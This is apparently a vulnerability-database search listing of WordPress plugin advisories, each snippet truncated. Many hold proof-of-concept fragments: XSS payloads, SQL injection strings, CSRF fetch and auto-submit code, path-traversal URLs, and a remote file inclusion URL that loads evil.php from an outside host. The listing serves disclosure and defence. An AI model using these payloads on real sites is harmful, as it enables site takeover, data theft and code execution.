4359 matches found
WP HTML Mail < 3.1.3 - Reflected Cross-Site Scripting
The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting https://example.com/wp-admin/options-general.php?page=wp-html-mail&tab=advanced&a"alert/XSS/...
RW Divi Unite Gallery <= 1.0 - Security Bypass via Outdated Freemius
The plugin is vulnerable to a security bypass due to the use of a known vulnerable component, Freemius 2.2.4. The plugin uses Freemius 1.0.0 and is therefore vulnerable. The core issue that causes the vulnerability is in the setdboption function, which is exposed to any authenticated user with no...
Relevanssi - Subscriber+ Unauthorised AJAX Calls
The plugins do not have authorisation and CSRF checks in some of their AJAX actions, allowing any authenticated users, such as subscriber, to call them. This could disclose information to subscribers, as well as allow them to truncate the index, which will disable the search...
Ad Inserter < 2.7.11 - Admin+ RCE / Stored XSS
The plugin does not make any security checks regarding the PHP and JS code in blocks, allowing high privilege users such as admin to execute commands on the underlying OS as well as perform Stored Cross-Site Scripting attacks even in multisite blogs and hardened ones. 1. Go to Settings - Ad...
Catch Web Tools < 2.7.1 - Subscriber+ Arbitrary Catch IDs Activation/Deactivation
The plugin does not have authorisation and CSRF check in its catchwebtoolscatchidsswitch AJAX action, allowing any authenticated users, such as subscriber to activate/disable Catch IDs fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...
WP Extra File Types < 0.5.1 - CSRF to Stored Cross-Site Scripting
The plugin does not have CSRF check when saving its settings, nor sanitise and escape some of them, which could allow attackers to make a logged in admin change them and perform Cross-Site Scripting attacks var form1 = document.getElementById'hack'; form1.submit;...
Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection
The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue error-based SQLI: orderby=id AND EXTRACTVALUE4795,CONCAT0x5c,0x717a627871,SELECT ELT4795=4795,1,0x7176707071 time-based...
WP Tiles <= 1.1.2 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks wp-tiles extraclasses='"...
uTubeVideo Gallery < 2.0.8 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. utubevideo view='panel' id='"...
Widgets for Google Reviews < 9.8 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Exploit...
Superforms < 6.0.4 - Reflected Cross-Site Scripting
The plugin does not escape the bobczypanstwasprawazostalarozwiazana parameter before outputting it back in an attribute via the superlanguageswitcher AJAX action, leading to a Reflected Cross-Site Scripting. The action is also lacking CSRF, making the attack easier to perform against any user...
Directories Pro < 1.3.46 - Authenticated Self-Reflected Cross-Site Scripting
The plugin did not sanitise the column names when importing a malicious CSV file, allowing for HTML or JavaScript injection. Iimport a CSV file containing the following in the header: 'term" autofocus onfocus=alert'Complex\u0020XSS';alertdocument.cookie;//'"...
Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access
The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server. Run the below command in the developer console of the we...
English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
The plugin does not validate the admincustomlanguagereturnurl before redirecting users o it, leading to an open redirect issue https://example.com/wp-admin/admin-ajax.php?action=heartbeat&admincustomlanguagetoggle=1&admincustomlanguagereturnurl=https://wpscan.com...
Thank Me Later <= 3.3.4 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Message Subject field before outputting it in the Messages list, which could allow high privileges users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Add/Edit a message and put the following...
WP-Appbox < 4.3.18 - Authenticated Local File Inclusion
The plugin does not validate user input before using it to create a local path then passed to an includeonce statement, leading to a Local File Inclusion issue https://example.com/wp-admin/options-general.php?page=wp-appbox&tab=advanced%2F..%2F...
Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.31 - Reflected Cross-Site Scripting
The plugin does not escape the lang and pid parameter before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?sibpageform&action=edit&id=1&pid=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22...
Leads-5050 Visitor Insights < 1.1.0 - Unauthorised License Change
The leads5050setlicense AJAX action is available to authenticated users, but is missing any capability and CSRF checks. This could allow any low privilege users subscriber+ to set an arbitrary license in the plugins settings POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/jso...
Workup – Job Board < 2.1.6 - Unauthenticated Reflected XSS
Unauthenticated Reflected XSS vulnerability was discovered in the «Workup – Job Board WordPress Theme», tested version — v2.1.5...
Advanced Custom Fields <= 5.7.10 - Unserialize of user input
Multiple maybeunserialize calls result with unserialize of user input. Low priviledged users as contributors, but in many cases visitors too https://medium.com/websec/wordpress-acf-5-7-10-unserialize-of-user-input-ac17cc473e0d...
Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass
The Wordfence Security – Firewall & Malware Scan WordPress plugin was affected by an Username Enumeration Prevention Bypass security vulnerability. Wordfence blocks: http://www.example.com/?author=1 But allowed: http://www.example.com/?author=1...
DiveBook <= 1.1.4 - Unauthenticated SQL Injection
The filterdiver GET parameter, in pages where the DiveBook is embed, does not properly sanitise and validate user data, leading to an Unauthenticated SQL injection vulnerability. The PoC will be displayed once the issue has been remediated...
GS Books Showcase < 1.3.1 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. gsbookshowcase theme='" onmouseover="alert1...
Weblizar Pin It Button On Image Hover And Post < 3.4 - Subscriber+ Arbitrary Settings Update
The plugin does not have authorisation and proper CSRF check when saving its settings, allowing any authenticated users, such as subscribers to update them fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type": "application/x-www-form-urlencoded", , "body": new...
Magee Shortcodes < 2.0.9 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape various parameters before outputting them back in attributes in AJAX actions available to both unauthenticated and authenticated users, leading to Reflected Cross-Site Scripting issues...
SupportCandy < 2.2.7 - CSRF to Cross-Site Scripting
The plugin does not have CSRF check in the wpsctickets AJAX action, nor has any sanitisation or escaping in some of the filter fields which could allow attackers to make a logged in user having access to the ticket lists dashboard set an arbitrary filter stored in their cookies with an XSS payloa...
True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the /admin/vendor/datatables/examples/resources/examples.php file. Exploit Authors: Nicole Sheinin, Liad Levy Tested on: MacOS !/usr/bin/env python3 impo...
Vanguard <= 2.1 - Multiple Cross-Site Scripting (XSS)
The plugin does not sanitise, validate or escape some of its parameters before outputting the back in various place, leading to either Stored or Reflected Cross-Site Scripting issues Put the following payload in the In Products Search box: " POST /search HTTP/1.1 Accept:...
WP Code Highlight.js < 0.6.3 - CSRF to Stored XSS
Lack of CSRF checks could allow attackers to make a logged in admin create XSS payloads. document.getElementById'hljs'.submit;...
Replyable < 2.2.10 - Subscriber+ PHP Object Injection
The plugin does not validate the class name submitted by the request when instantiating an object in the promptdismissnotice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could...
Show All Comments < 7.0.1 - Reflected XSS
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. Visit the following URL authenticated or not to trigger an alert box:...
Error Log Viewer Plugin <= 1.1.1 - Admin+ Arbitrary File Clearing
The plugin does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder Click the "Log Monitor" available under Error Log Viewer menu item. Choose a log file to clear. Intercept the reques...
GTranslate < 2.8.52 - Unauthenticated Reflected Cross Site Scripting (XSS)
The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. The vulnerability was due to outputting the WordPress addqueryarg...
WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
Description According to the WordPress release notes: "Props to Soroush Dalili @irsdl from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting XSS attacks." Thanks to @irsdl's Hacker1 disclosure: JS - Numerical Entities JS - Hex Entities...
GS Portfolio for Envato < 1.4.0 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks Insert the following shortcode in a...
Crazy Bone <= 0.6.0 - Unauthenticated Stored XSS
The plugin does not sanitise and escape the username submitted via the login from when displaying them back in the log dashboard, leading to an unauthenticated Stored Cross-Site scripting curl 'https://example.com/wp-login.php' --data-raw 'log=a&pwd=x&wp-submit=Log+In' The XSS will be trigged in...
IP2Location Country Blocker < 2.26.5 - Subscriber+ Arbitrary Country Ban
The plugin does not have authorisation and CSRF checks in the ip2locationcountryblockersaverules AJAX action, allowing any authenticated users, such as subscriber to call it and block arbitrary country, or block all of them at once, preventing users from accessing the frontend. v2.26.5 added...
Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF
The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog https://examle.com/wp-admin/admin.php?page=wpedonmenu&action=delete&action2=delete&order=1...
Download Manager < 3.2.22 - Subscriber+ Stored Cross-Site Scripting
The plugin does not sanitise and escape Template data before outputting it in various pages such as admin dashboard and frontend. Due to the lack of authorisation and CSRF checks in the wpdmsavetemplate AJAX action, any authenticated users such as subscriber is able to call it and perform...
Members List < 4.3.7 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues https://example.com/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg/src/onerror=alert/XSS/%20x...
Core Tweaks WP Setup <= 4.1 - Arbitrary Admin Account Creation / Admin Email Update via CSRF
The plugin allows to bulk-set many settings in WordPress, including the admin email, as well as creating a new admin account. There is no CSRF protection in place, allowing an attacker to arbitrary change the admin email or create another admin account and takeover the website via CSRF attacks...
Magazine Edge <= 1.13 - Subscriber+ Arbitrary Plugin Activation
The theme does not have authorisation and CSRF when activating plugins via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary plugins Run the below command in the developer console of the web browser while being on the blog as a subscriber user...
GS Filterable Portfolio < 1.6.1 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. Note: First, you need to add a Portfolio...
WPcalc <= 2.1 - Authenticated SQL Injection
The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin. http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND SELECT 7156 FROM SELECTSLEEP5MIkl or,...
Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting
The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against logged in admin viewing the inserted Leads fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...
Page Builder by SiteOrigin < 2.10.16 - CSRF to Reflected Cross-Site Scripting (XSS)
Flaws in the live editor and actionbuildercontent functions of the plugin "allow attackers to forge requests on behalf of a site administrator and execute malicious code in the administrator’s browser. The attacker needs to trick a site administrator into executing an action, like clicking a link...
Art-Picture-Gallery <= 1.2.9 - Unauthenticated Arbitrary File Upload
Edit WPScanTeam: March 26th, 2020 - Report Received & Vendor Contacted March 30th, 2020 - Escalated to WP Plugins team as no response from vendor March 31st, 2020 - WP Plugins team investigating & Plugin closed April 2nd, 2020 - Disclosure The PoC will be displayed once the issue has been remedia...
Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS
Lack of CSRF checks and sanitisation on the plugin's settings page could allow XSS attacks via CSRF. document.getElementById'csrf'.submit;...
The Events Calendar < 5.14.0 - Reflected Cross-Site Scripting
The plugin does not escape an aggregator URL before outputting it back in an attribute, leading to Reflected Cross-Site Scripting When there is an Event Aggregator license key active: https://example.com/wp-admin/edit.php?page=tribe-common&tab=imports&posttype=tribeevents&"alert/XSS/...
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...